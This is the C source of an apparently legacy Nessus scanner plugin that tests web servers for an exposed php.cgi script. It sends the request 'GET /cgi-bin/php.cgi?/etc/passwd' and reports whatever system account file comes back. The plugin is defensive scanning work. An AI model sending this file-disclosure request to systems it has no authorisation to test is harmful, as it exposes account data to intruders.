#include <config.h>
#include <nessus-devel.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <nessuslib.h>
#include <sys/socket.h>  


#define NAME "PHP-cgi tester"
#define DESC "Determination of the presence of the 'php' cgi"
#define COPYRIGHT "no copyright"
#define SUMM "determines the presence of the 'php' cgi"


int plugin_init(struct arglist *desc);
int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_ATTACK);
	plug_set_family(desc, "CGI abuses");
	return(0);
}



int plugin_run(struct arglist * args);	
int plugin_run(struct arglist * args)
{
	
	if(host_get_port_state(args, 80)<=0)return(0);
	if(is_cgi_installed(args, "php.cgi"))
	{
	char * buffer = emalloc(32000);
	char * result;
	int soc = open_sock_tcp(args, 80);
	
	if(soc<=0)
	 /* Couldn't re-open the connection... Strange !*/
	 post_hole(args, 80, "The 'php' cgi is present\nRemote files may be viewable");
	else {
	  	sprintf(buffer, "GET /cgi-bin/php.cgi?/etc/passwd\n");
		send(soc, buffer, strlen(buffer), 0);
		bzero(buffer, 32000);
		read(soc, buffer, 32000);
		result = emalloc(strlen(buffer) + 100);
		sprintf(result, "The 'php' cgi is present\nWe attempted to obtain /etc/passwd :\n%s\n", buffer);
		efree(buffer);
		post_hole(args, 80, result);
		efree(result);
		close(soc);
		}
	
	}
	return(0);
}

